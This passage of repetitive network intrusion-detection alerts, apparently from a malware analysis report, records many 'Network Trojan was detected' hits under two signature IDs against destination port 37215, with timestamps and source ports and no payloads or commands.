          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306441
          SID:2829579
          Source Port:45914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884429
          SID:2829579
          Source Port:37330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237304
          SID:2835222
          Source Port:42164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042729
          SID:2835222
          Source Port:58174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109030
          SID:2835222
          Source Port:50544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188079
          SID:2829579
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671816
          SID:2835222
          Source Port:48270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.853781
          SID:2835222
          Source Port:58040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035131
          SID:2835222
          Source Port:49276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242327
          SID:2829579
          Source Port:48028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405087
          SID:2835222
          Source Port:50974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858983
          SID:2829579
          Source Port:49268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.594949
          SID:2829579
          Source Port:44376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175680
          SID:2829579
          Source Port:55068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270770
          SID:2835222
          Source Port:51038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841822
          SID:2835222
          Source Port:51656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353280
          SID:2829579
          Source Port:36962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158985
          SID:2835222
          Source Port:60472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732632
          SID:2829579
          Source Port:56134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884586
          SID:2835222
          Source Port:37288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110378
          SID:2835222
          Source Port:33324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160464
          SID:2835222
          Source Port:45600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237381
          SID:2829579
          Source Port:42346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.176230
          SID:2829579
          Source Port:44646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746842
          SID:2835222
          Source Port:58520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163865
          SID:2829579
          Source Port:35512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401962
          SID:2829579
          Source Port:35450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442038
          SID:2829579
          Source Port:57064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163802
          SID:2829579
          Source Port:60946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395124
          SID:2829579
          Source Port:51354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598697
          SID:2835222
          Source Port:50024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739133
          SID:2835222
          Source Port:55774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276615
          SID:2829579
          Source Port:46152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242889
          SID:2829579
          Source Port:54112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178204
          SID:2829579
          Source Port:48202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174568
          SID:2835222
          Source Port:50266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109026
          SID:2835222
          Source Port:49526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166632
          SID:2829579
          Source Port:38746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160586
          SID:2835222
          Source Port:53050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746585
          SID:2835222
          Source Port:39176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547905
          SID:2829579
          Source Port:56716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239788
          SID:2829579
          Source Port:60346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264816
          SID:2829579
          Source Port:35870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160558
          SID:2829579
          Source Port:33940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745717
          SID:2835222
          Source Port:34210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853043
          SID:2829579
          Source Port:56266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441806
          SID:2835222
          Source Port:38506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178985
          SID:2829579
          Source Port:49208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550124
          SID:2829579
          Source Port:45640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355955
          SID:2835222
          Source Port:59978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749148
          SID:2835222
          Source Port:41922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806112
          SID:2829579
          Source Port:43808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275757
          SID:2835222
          Source Port:44246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116622
          SID:2835222
          Source Port:39324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161566
          SID:2835222
          Source Port:50928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257825
          SID:2829579
          Source Port:34902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114025
          SID:2835222
          Source Port:39838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783148
          SID:2829579
          Source Port:55420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158448
          SID:2835222
          Source Port:44224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808882
          SID:2835222
          Source Port:53920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471498
          SID:2829579
          Source Port:56134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114444
          SID:2829579
          Source Port:33558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174697
          SID:2829579
          Source Port:43662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862019
          SID:2829579
          Source Port:49984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191982
          SID:2835222
          Source Port:46184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600200
          SID:2829579
          Source Port:57602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163257
          SID:2829579
          Source Port:51128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832510
          SID:2829579
          Source Port:40062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148685
          SID:2829579
          Source Port:48604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796548
          SID:2835222
          Source Port:43868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857931
          SID:2829579
          Source Port:33576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353802
          SID:2835222
          Source Port:56180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551464
          SID:2829579
          Source Port:43962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351775
          SID:2835222
          Source Port:46884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131269
          SID:2835222
          Source Port:52252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176931
          SID:2835222
          Source Port:42656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740332
          SID:2835222
          Source Port:47568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039348
          SID:2835222
          Source Port:54600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394997
          SID:2829579
          Source Port:55600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.462838
          SID:2835222
          Source Port:58760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263692
          SID:2829579
          Source Port:43542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035587
          SID:2835222
          Source Port:59774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800696
          SID:2835222
          Source Port:53626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157963
          SID:2829579
          Source Port:44438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791516
          SID:2835222
          Source Port:46348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912293
          SID:2829579
          Source Port:56708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.443972
          SID:2835222
          Source Port:42464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599511
          SID:2829579
          Source Port:58418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855502
          SID:2835222
          Source Port:43130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176273
          SID:2835222
          Source Port:41702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017792
          SID:2829579
          Source Port:51184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042770
          SID:2835222
          Source Port:41362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157169
          SID:2829579
          Source Port:57336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107054
          SID:2835222
          Source Port:41494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783293
          SID:2829579
          Source Port:41272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442446
          SID:2829579
          Source Port:43548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601135
          SID:2835222
          Source Port:34276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742146
          SID:2835222
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178549
          SID:2835222
          Source Port:35126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517804
          SID:2835222
          Source Port:36230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191752
          SID:2829579
          Source Port:43076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797472
          SID:2835222
          Source Port:45332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126785
          SID:2829579
          Source Port:38138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744987
          SID:2829579
          Source Port:44014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462106
          SID:2835222
          Source Port:41216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707077
          SID:2829579
          Source Port:52676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861985
          SID:2829579
          Source Port:60042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160614
          SID:2835222
          Source Port:42102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731790
          SID:2829579
          Source Port:43314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404556
          SID:2829579
          Source Port:40038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542769
          SID:2835222
          Source Port:44132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799555
          SID:2835222
          Source Port:52068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115975
          SID:2829579
          Source Port:38078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796246
          SID:2835222
          Source Port:59070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.801127
          SID:2835222
          Source Port:58110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157297
          SID:2835222
          Source Port:36856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114137
          SID:2829579
          Source Port:53178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132933
          SID:2829579
          Source Port:46402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808580
          SID:2835222
          Source Port:33888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554890
          SID:2829579
          Source Port:46922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266559
          SID:2829579
          Source Port:55782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108987
          SID:2829579
          Source Port:51644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747237
          SID:2835222
          Source Port:37906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153041
          SID:2829579
          Source Port:43326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134176
          SID:2829579
          Source Port:33242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546523
          SID:2835222
          Source Port:49398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857375
          SID:2829579
          Source Port:39024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258072
          SID:2835222
          Source Port:34888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410688
          SID:2835222
          Source Port:48974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113275
          SID:2835222
          Source Port:34040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672914
          SID:2829579
          Source Port:59370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166450
          SID:2829579
          Source Port:52396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792005
          SID:2829579
          Source Port:53820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158156
          SID:2835222
          Source Port:38328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670109
          SID:2835222
          Source Port:34666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861707
          SID:2829579
          Source Port:33590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110285
          SID:2829579
          Source Port:49594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059558
          SID:2835222
          Source Port:58340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671043
          SID:2835222
          Source Port:34840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237320
          SID:2835222
          Source Port:46826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817778
          SID:2835222
          Source Port:50172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131092
          SID:2829579
          Source Port:57430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263893
          SID:2829579
          Source Port:49662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671654
          SID:2835222
          Source Port:57984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602064
          SID:2835222
          Source Port:34362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352727
          SID:2835222
          Source Port:57280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.863165
          SID:2835222
          Source Port:59174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038499
          SID:2835222
          Source Port:50194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862500
          SID:2829579
          Source Port:47656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.119077
          SID:2835222
          Source Port:52058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070846
          SID:2829579
          Source Port:36940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175917
          SID:2835222
          Source Port:38214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351007
          SID:2829579
          Source Port:38868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162899
          SID:2829579
          Source Port:40014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192282
          SID:2835222
          Source Port:58146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550236
          SID:2835222
          Source Port:35782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266585
          SID:2829579
          Source Port:33398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792817
          SID:2829579
          Source Port:46006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160888
          SID:2835222
          Source Port:39798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175729
          SID:2835222
          Source Port:53384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108024
          SID:2829579
          Source Port:49756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795773
          SID:2835222
          Source Port:48040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268952
          SID:2829579
          Source Port:50152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238034
          SID:2829579
          Source Port:42222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107607
          SID:2835222
          Source Port:56732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263969
          SID:2829579
          Source Port:46622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672407
          SID:2835222
          Source Port:44780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264915
          SID:2829579
          Source Port:60784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261319
          SID:2829579
          Source Port:40854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733359
          SID:2829579
          Source Port:50940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152513
          SID:2829579
          Source Port:48104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518189
          SID:2829579
          Source Port:34816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599969
          SID:2835222
          Source Port:44770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841617
          SID:2829579
          Source Port:42754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890413
          SID:2835222
          Source Port:37528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741595
          SID:2829579
          Source Port:41684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891903
          SID:2829579
          Source Port:55502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460730
          SID:2829579
          Source Port:43298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732364
          SID:2835222
          Source Port:32786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783375
          SID:2829579
          Source Port:34558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161048
          SID:2829579
          Source Port:53280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516425
          SID:2829579
          Source Port:60944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706473
          SID:2829579
          Source Port:54430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.863241
          SID:2835222
          Source Port:56784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108233
          SID:2835222
          Source Port:52888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041263
          SID:2829579
          Source Port:34092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818637
          SID:2835222
          Source Port:35586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130596
          SID:2829579
          Source Port:34090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463924
          SID:2835222
          Source Port:41520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262314
          SID:2829579
          Source Port:38516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355918
          SID:2835222
          Source Port:47944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173870
          SID:2829579
          Source Port:50316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796161
          SID:2835222
          Source Port:40812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270944
          SID:2835222
          Source Port:48512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110465
          SID:2835222
          Source Port:58960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518145
          SID:2835222
          Source Port:55228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352980
          SID:2835222
          Source Port:47686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
